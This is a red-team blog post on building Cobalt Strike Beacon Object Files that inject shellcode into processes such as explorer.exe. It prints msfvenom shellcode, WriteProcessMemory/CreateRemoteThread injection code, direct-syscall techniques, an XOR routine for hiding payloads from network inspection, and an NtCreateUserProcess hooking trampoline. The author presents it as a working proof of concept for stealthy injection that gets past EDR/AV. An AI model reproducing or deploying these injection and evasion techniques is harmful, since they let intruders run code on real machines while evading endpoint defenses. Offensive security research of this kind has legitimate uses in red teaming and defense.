I still haven’t solved the memcpy mystery from last week, but I did succeed in developing some Beacon Object Files that help Red Teams fly under the radar.
1. Printf(“Hello again, world!\n”);
Last week I talked about virtual address space, userland hooking, how Windows separates user space from kernel space, and how direct syscalls take advantage of that separation to bypass EDR/AV.
Today I’ll dive deeper into the intricacies of process injection.
The process of process injection (see what I did there) usually follows a few basic steps.
- Get a handle to the process we want to inject into
- Allocate some memory in the target process with READ, WRITE, EXECUTE permissions
- Write our malicious code to the allocated memory
- Get the target process to execute our malicious code
Easier said than done. Processes don’t particularly like it when you start messing with their memory and threads, and more often than not will crash. With these basics in mind, I started working on my own Beacon Object File that could inject shellcode into a process. All I needed were some Win32 API functions that would perform the aforementioned steps.
There are some great resources out there on the topic of process injection, like “Windows Process Injection in 2019” by SafeBreach Labs. I decided to start with the easiest and most stable approach: spawning my own process. I wanted to stay away from loading DLLs and inject raw shellcode instead.
“What is shellcode and what does it look like?”, I can hear you ask. Shellcode is a tiny program written directly as machine code, in the form of opcodes and operands. Opcodes, or operation codes, are the hexadecimal representation of assembly instructions; operands are the hexadecimal representation of the CPU registers, flags, numbers, and so on that those instructions act on.
For all my payloads I will be using x64 shellcode to start calc.exe, the Windows calculator.
//generated with: msfvenom -p windows/x64/exec CMD=calc.exe -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";
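To make the opcode/operand split concrete, the first ten bytes of the array above can be picked apart by hand. The sketch below is only an illustration: `read_le32`, `call_target` and `prologue` are hypothetical names, not part of the original code. It copies those ten bytes and works out where the `call` instruction in them lands.

```c
#include <stddef.h>
#include <stdint.h>

/* First ten bytes of the payload above, one instruction per line:
 *   fc              cld            (opcode only, no operand)
 *   48 83 e4 f0     and rsp, -16   (REX.W prefix, opcode 83, ModRM e4, imm8 f0)
 *   e8 c0 00 00 00  call +0xc0     (opcode e8, 32-bit relative operand)      */
static const unsigned char prologue[] = {
    0xfc,
    0x48, 0x83, 0xe4, 0xf0,
    0xe8, 0xc0, 0x00, 0x00, 0x00
};

/* Reads a 32-bit little-endian operand starting at p. */
static int32_t read_le32(const unsigned char *p)
{
    uint32_t v = (uint32_t)p[0]
               | ((uint32_t)p[1] << 8)
               | ((uint32_t)p[2] << 16)
               | ((uint32_t)p[3] << 24);
    return (int32_t)v;
}

/* For a `call rel32` (opcode 0xE8) at offset `off`, returns the offset the
 * call transfers control to, or -1 if there is no such instruction there.
 * The operand is relative to the end of the 5-byte instruction. */
static long call_target(const unsigned char *code, size_t len, size_t off)
{
    if (off + 5 > len || code[off] != 0xE8)
        return -1;
    return (long)off + 5 + read_le32(code + off + 1);
}
```

Calling `call_target(prologue, sizeof(prologue), 5)` gives `0xca`, which is the offset of the `\x5d` byte (`pop rbp`) further down in the array.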
2. 𝅘𝅥 𝅘𝅥𝅮 Allocate, Write, Inject, Repeat 𝅘𝅥𝅯 𝅘𝅥𝅯
First things first. We need to spawn a new process to inject into. To spawn a new process, we can use the CreateProcessA function contained in kernel32.dll. We only need a few basic parameters to start a new instance of calc.exe.
//holds information about the newly created process, like: process ID, main thread ID, and handles
PROCESS_INFORMATION pi;
//specifies the window station, desktop, standard handles, and appearance of the main window for a process at creation time
STARTUPINFOA si; //ANSI variant, to match CreateProcessA
//set the memory to 0
memset(&si, 0, sizeof(si));
memset(&pi, 0, sizeof(pi));
si.cb = sizeof(si); //the structure size has to be filled in before the call
//create a new instance of windows calculator; dwCreationFlags is a DWORD, so pass 0 rather than NULL
CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
To use our newly spawned process, we need to obtain a handle to it. We can use the OpenProcess function contained in kernel32.dll. For the sake of keeping this blog post somewhat short (who am I kidding), we will assume we know the process ID (PID) of our calc.exe process. In practice I utilise code to enumerate all the running processes on the machine until I have found calculator.exe.
DWORD pid = 6969; //calc.exe
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
Armed with the process handle, we can now allocate some memory, which we will later use to write our shellcode to. To do this, we use the VirtualAllocEx function contained in kernel32.dll. It is important to specify PAGE_EXECUTE_READWRITE, so we later have permission to execute the code located in this memory block. By default, memory that is writable is not executable and vice versa.
LPVOID shellcode_address = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
The final step before execution is writing our shellcode to the memory block we just allocated in the target process. To do this, we use the WriteProcessMemory function contained in kernel32.dll.
WriteProcessMemory(hProcess, shellcode_address, shellcode, sizeof(shellcode), NULL);
Now all that’s left is to make the target process execute our shellcode. There are multiple ways to go about this, but to keep things easy we will use the CreateRemoteThread function contained in kernel32.dll to start up a new thread in the target process which will then execute our shellcode.
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcode_address, shellcode_address, 0, NULL);
CloseHandle(hProcess); //clean up
3. Look mom, no process!
Yikes, kernel32.dll. This wouldn’t fly under any radar.
You’re right. The method we used earlier to spawn a new process and inject our shellcode into it is probably the most well-known, noisy, easily detected, unsophisticated way of doing things. But we need to learn how to walk before we can run.
To spice things up and make something that will actually bypass EDR/AV, I needed to make some changes. First and foremost I had to get rid of the process creation. Spawning new processes is incredibly noisy and obvious. Instead we can scour the lands of Microsoft Windows in search of a process that blends in well and is usually present on any Windows system (looking at you, explorer.exe).
So, to start things off, I’ll enumerate all the running processes on the system until I find explorer.exe, grab its process ID (PID) and use it to obtain a process handle. To obtain the handle I use NtOpenProcess contained in ntdll.dll as a direct syscall.
The next steps in the process remain the same, although I use the ntdll.dll versions of the API calls, namely NtAllocateVirtualMemory and NtWriteVirtualMemory, again as direct syscalls.
To wrap up and execute the shellcode, I use the NtCreateThreadEx function contained in ntdll.dll to create a new remote thread in explorer.exe, and clean up our mess with NtClose to close any remaining handles.
4. Let’s cram this into a BOF
BOFs are supposed to be tiny, hence they use dynamic imports to resolve functions. Since I’m using direct syscalls which can’t be dynamically resolved, I have about 900 lines of overhead code that mainly hold the different structures, flags and definitions as well as the raw assembly for the syscalls. These are generated by SysWhispers and InlineWhispers.
The remaining kernel32.dll and libc functions are dynamically imported in a format provided by Cobalt Strike.
//dynamic import for kernel32.dll function
DECLSPEC_IMPORT WINBASEAPI return_type_here WINAPI KERNEL32$FunctionNameHere(PARAMETER_TYPES_HERE);
//dynamic import for libc function
DECLSPEC_IMPORT return_type_here MSVCRT$FunctionNameHere(PARAMETER_TYPES_HERE);
5. Script absolutely EVERYTHING
A good exploit wouldn’t be complete without a great script to go with it. Luckily for me, Cobalt Strike supports something called Aggressor Script, which is built on top of Sleep. This allows me to handle payload/shellcode creation/insertion, encryption, and custom user parameters for process creation and/or targeting.
So I created this neat little dialog that allows the user to specify the payload either via file or as a Base64-encoded string and customize some process spawning properties.
The script also performs a single-byte XOR encryption routine on the payload. This is done to make it harder for appliances to detect shellcode being transported over the network. It looks like this:
sub xor
{
    # $1 = shellcode
    # $2 = key
    local('$buf $key');
    $key = "nice try ;)";
    for ($i = 0; $i < strlen($1); $i++)
    {
        $buf .= chr(asc(charAt($1, $i)) ^ $key);
    }
    return $buf;
}
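Single-byte XOR is its own inverse, which is why the same routine works on both ends. As a minimal sketch of that property in C (the function name `xor_buffer` and the key value used in the usage note are assumptions for illustration, not taken from the original tooling), applied to a harmless buffer:

```c
#include <stddef.h>

/* XORs every byte of buf with the same single-byte key, in place.
 * Running it a second time with the same key restores the original bytes. */
static void xor_buffer(unsigned char *buf, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}
```

For example, running `xor_buffer` twice with key `0x5A` over the bytes of `"calc"` returns the original string. Note that any `0x00` byte in the input comes out as the key itself, which is one reason this only masks data rather than protecting it.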
I considered implementing RC4 encryption instead, but since I also have to decrypt the payload on the other side, the overhead is not worth the added benefits. After all, we’re not going for uncrackable encryption, we just want to mask the shellcode for network inspection.
After confirming the dialog, the payload is successfully injected into explorer.exe and I get a beacon callback.
6. And for my final trick, I will…
…spawn a process.
Huh? You just got rid of that.
As mentioned before, process injection is extremely volatile, and more often than not causes the target process to crash. So I set out on an adventure to spawn my own processes using NtCreateUserProcess as a direct syscall, to hopefully get past EDR/AV and not stir up too much noise.
In the days of Windows XP, process creation used to happen in a couple of steps, using NtCreateProcess, RtlCreateUserThread and some other functions like NtOpenFile and NtCreateSection. When Microsoft released the epic failure that was Vista, they also changed how process creation works and chucked all the different API calls together into one single call, namely NtCreateUserProcess. When we spawned calc.exe using CreateProcessA, several different APIs were called along the way, as shown in the image below.
At the very bottom we end up with NtCreateUserProcess, which will then talk to the kernel or perform some magic to switch to x64 mode.
After a lot of digging for process parameters, their structures and how they need to be initialized, I managed to come up with code that successfully spawns a new calc.exe process in a suspended state with the help of Microwave89’s research on the topic.
<VARIABLE DECLARATION TRUNCATED FOR SPACE>
///We should supply a minimal environment (environment variables). Following one is simple yet fits our needs.
char data[2 * sizeof(ULONGLONG)] = { 'Y', 0x00, 0x3D, 0x00, 'Q', 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
protectionInfo.Signer = (UCHAR)PsProtectedSignerNone;
protectionInfo.Type = (UCHAR)PsProtectedTypeNone;
protectionInfo.Audit = 0;
RtlSecureZeroMemory(&userParams, sizeof(RTL_USER_PROCESS_PARAMETERS));
RtlSecureZeroMemory(&attrList, sizeof(PS_ATTRIBUTE_LIST) - sizeof(PS_ATTRIBUTE));
RtlSecureZeroMemory(&procInfo, sizeof(PS_CREATE_INFO));
userParams.Length = sizeof(RTL_USER_PROCESS_PARAMETERS);
userParams.MaximumLength = sizeof(RTL_USER_PROCESS_PARAMETERS);
attrList.TotalLength = sizeof(PS_ATTRIBUTE_LIST) - sizeof(PS_ATTRIBUTE);
procInfo.Size = sizeof(PS_CREATE_INFO);
userParams.Environment = (WCHAR*)data;
userParams.EnvironmentSize = sizeof(data);
userParams.Flags = RTL_USER_PROCESS_PARAMETERS_NORMALIZED;
attrList.Attributes[0].Attribute = PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE);
attrList.Attributes[0].Size = pProcessImageName->Length;
attrList.Attributes[0].Value = (ULONG_PTR)pProcessImageName->Buffer;
status = NtCreateUserProcess(&hProcess, &hThread, MAXIMUM_ALLOWED, MAXIMUM_ALLOWED, NULL, NULL, 0, THREAD_CREATE_FLAGS_CREATE_SUSPENDED, &userParams, &procInfo, &attrList);
However, the newly spawned process crashes immediately when execution is resumed, so it is not fit for injection.
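As an aside, the `data` array in the listing above is easier to read once you know what it encodes. A Windows environment block is a run of NUL-terminated UTF-16LE strings followed by one extra terminator, so those sixteen bytes spell out a single variable. The sketch below uses a hypothetical helper, `first_env_entry` (not part of the original code), and only handles plain ASCII characters; it decodes the first entry of such a block.

```c
#include <stddef.h>

/* Copies the first NUL-terminated UTF-16LE string in `block` into `out`
 * as ASCII and returns the number of characters written (terminator not
 * counted). Code units outside the ASCII range are replaced with '?'. */
static size_t first_env_entry(const unsigned char *block, size_t block_len,
                              char *out, size_t out_cap)
{
    size_t n = 0;

    if (out_cap == 0)
        return 0;

    /* Walk the block two bytes (one UTF-16 code unit) at a time. */
    for (size_t i = 0; i + 1 < block_len && n + 1 < out_cap; i += 2) {
        unsigned lo = block[i];
        unsigned hi = block[i + 1];

        if (lo == 0 && hi == 0)   /* end of the first string */
            break;
        out[n++] = (hi == 0 && lo < 0x80) ? (char)lo : '?';
    }
    out[n] = '\0';
    return n;
}
```

Fed the sixteen bytes of `data`, this yields the three-character string `Y=Q`, i.e. an environment containing one variable named `Y` with the value `Q`.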
7. I’m the EDR now
In an attempt to find a workaround for the extremely limited function parameters, I decided to try and hook NtCreateUserProcess. When I spawn a process using CreateProcessA, my hook intercepts the call, so I can replace NtCreateUserProcess with my own version while preserving the function parameters passed by CreateProcessA. Using LoadLibraryA and GetProcAddress I can find the memory address associated with NtCreateUserProcess. Then I’ll read and save the first 6 bytes of the function, and replace them with machine code that pushes the address of my trampoline function onto the stack and returns to it.
int main()
{
HINSTANCE library = LoadLibraryA("ntdll.dll");
SIZE_T bytesRead = 0;
// get address of the NtCreateUserProcess function in memory
NtCreateUserProcessAddr = GetProcAddress(library, "NtCreateUserProcess");
// save the first 6 bytes of the original NtCreateUserProcess function - will need for unhooking
ReadProcessMemory(GetCurrentProcess(), (LPCVOID)NtCreateUserProcessAddr, NtCreateUserProcessOriginalBytes, 6, &bytesRead);
// create a patch "push <address of trampoline function>; ret"
// 0x68 = push imm32, 0xC3 = ret
// wonky cast to get around C++ ISO rules - https://stackoverflow.com/questions/45134220/how-to-convert-a-pointer-of-type-void-to-void
void *trampolineAddr = reinterpret_cast<void*>(&trampoline);
char patch[6] = { 0 };
memcpy_s(patch, 1, "\x68", 1);
memcpy_s(patch + 1, 4, &trampolineAddr, 4);
memcpy_s(patch + 5, 1, "\xC3", 1);
// patch NtCreateUserProcess
WriteProcessMemory(GetCurrentProcess(), (LPVOID)NtCreateUserProcessAddr, patch, sizeof(patch), &bytesWritten);
// Execute code after hooking
PROCESS_INFORMATION pi;
STARTUPINFOA si; // ANSI variant, to match CreateProcessA
memset(&si, 0, sizeof(si));
memset(&pi, 0, sizeof(pi));
si.cb = sizeof(si);
CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
return 0;
}
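The six-byte patch assembled in main() can be looked at in isolation. The sketch below uses a hypothetical helper, `build_push_ret` (not part of the original code), that only fills a local buffer and touches no other memory. It also makes one property of the encoding visible: opcode `0x68` carries a 32-bit immediate, which a 64-bit CPU sign-extends before pushing, so this form can only express addresses that fit in 32 signed bits. The helper reports when an address does not fit. Whether that has anything to do with the crash discussed at the end of this post is not something the sketch tries to establish.

```c
#include <stdint.h>

#define PATCH_SIZE 6

/* Writes "push imm32; ret" for `target` into out[0..5].
 * Returns 0 on success, or -1 if `target` cannot be represented as a
 * sign-extended 32-bit immediate (in which case out is left untouched). */
static int build_push_ret(uint64_t target, unsigned char out[PATCH_SIZE])
{
    int64_t as_signed = (int64_t)target;
    uint32_t imm;

    if (as_signed < INT32_MIN || as_signed > INT32_MAX)
        return -1;

    imm = (uint32_t)target;
    out[0] = 0x68;                                /* push imm32        */
    out[1] = (unsigned char)(imm & 0xFF);         /* immediate, stored */
    out[2] = (unsigned char)((imm >> 8) & 0xFF);  /* least significant */
    out[3] = (unsigned char)((imm >> 16) & 0xFF); /* byte first        */
    out[4] = (unsigned char)((imm >> 24) & 0xFF);
    out[5] = 0xC3;                                /* ret               */
    return 0;
}
```

For the trampoline address that appears in the WinDbg output discussed next, `0x02164000`, the helper produces the bytes `68 00 40 16 02 C3`; an address such as `0x00007FF612340000` is rejected.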
This is what the original NtCreateUserProcess looks like in WinDbg when disassembled.
After executing main() and patching the function, the bytes at address 0x1b7ae600 are now my \x68 or push and the memory address to my trampoline function 0x02164000.
The bytes at 0x1b7ae605 are now \xc3 or ret.
When CreateProcessA calls NtCreateUserProcess, execution will instead jump to my hook trampoline function. The trampoline function acts as a wrapper around my hook function and pushes all the registers onto the stack to preserve them. After it has pushed all the registers it will then call my hooked version of NtCreateUserProcess.
__declspec(naked) NTSTATUS trampoline(PHANDLE ProcessHandle, PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess, ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG ProcessFlags, ULONG ThreadFlags, PRTL_USER_PROCESS_PARAMETERS ProcessParameters, PPS_CREATE_INFO CreateInfo, PPS_ATTRIBUTE_LIST AttributeList)
{
printf("Pushing registers\n");
asm("push rax;"
"push rbx;"
"push rcx;"
"push rdx;"
"push r8;"
"push r9;"
"push r10;"
"push r11;"
"push r12;"
"push r13;"
"push r14;"
"push r15;"
"push rsi;"
"push rdi;"
"push rbp;"
"push rsp;");
NTSTATUS status = HookedNtCreateUserProcess(ProcessHandle, ThreadHandle, ProcessDesiredAccess, ThreadDesiredAccess, ProcessObjectAttributes, ThreadObjectAttributes, ProcessFlags, ThreadFlags, ProcessParameters, CreateInfo, AttributeList);
return status;
}
My HookedNtCreateUserProcess function first pops and restores all the registers that were pushed onto the stack by the trampoline function, then it will unpatch the original NtCreateUserProcess and call my direct syscall version of NtCreateUserProcess and pass the parameters we got from CreateProcessA.
NTSTATUS __stdcall HookedNtCreateUserProcess(PHANDLE ProcessHandle, PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess, ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG ProcessFlags, ULONG ThreadFlags, PRTL_USER_PROCESS_PARAMETERS ProcessParameters, PPS_CREATE_INFO CreateInfo, PPS_ATTRIBUTE_LIST AttributeList)
{
printf("Hello from hooked NtCreateUserProcess ;)\n");
printf("Popping registers\n");
asm("pop rsp;"
"pop rbp;"
"pop rdi;"
"pop rsi;"
"pop r15;"
"pop r14;"
"pop r13;"
"pop r12;"
"pop r11;"
"pop r10;"
"pop r9;"
"pop r8;"
"pop rdx;"
"pop rcx;"
"pop rbx;"
"pop rax;");
// unpatch
WriteProcessMemory(GetCurrentProcess(), (LPVOID)NtCreateUserProcessAddr, NtCreateUserProcessOriginalBytes, sizeof(NtCreateUserProcessOriginalBytes), &bytesWritten);
// call the original
printf("Calling original\n");
return NtCreateUserProcess(ProcessHandle, ThreadHandle, ProcessDesiredAccess, ThreadDesiredAccess, ProcessObjectAttributes, ThreadObjectAttributes, ProcessFlags, ThreadFlags, ProcessParameters, CreateInfo, AttributeList);
}
8. Wrapping up
Unfortunately there are still issues with the inline assembly code for NtCreateUserProcess and with the fact that I’m messing up the stack. I suspect there are certain registers that CreateProcessA expects to remain constant throughout its call to NtCreateUserProcess, hence the trampoline function, but something is still off, resulting in a segfault.
Fun fact: in 32-bit x86 assembly there are two instructions called pushad and popad, which push and pop all the general-purpose registers to and from the stack. When x64 came around the corner, they needed space for new instructions, and pushad and popad were sacrificed.
I’m pretty proud I’ve gotten this far. In my humble opinion I have developed a useful, working PoC that can be used by Cobalt Strike to perform stealthy(ish) process injection.
NtDelayExecution(FALSE, 604800000);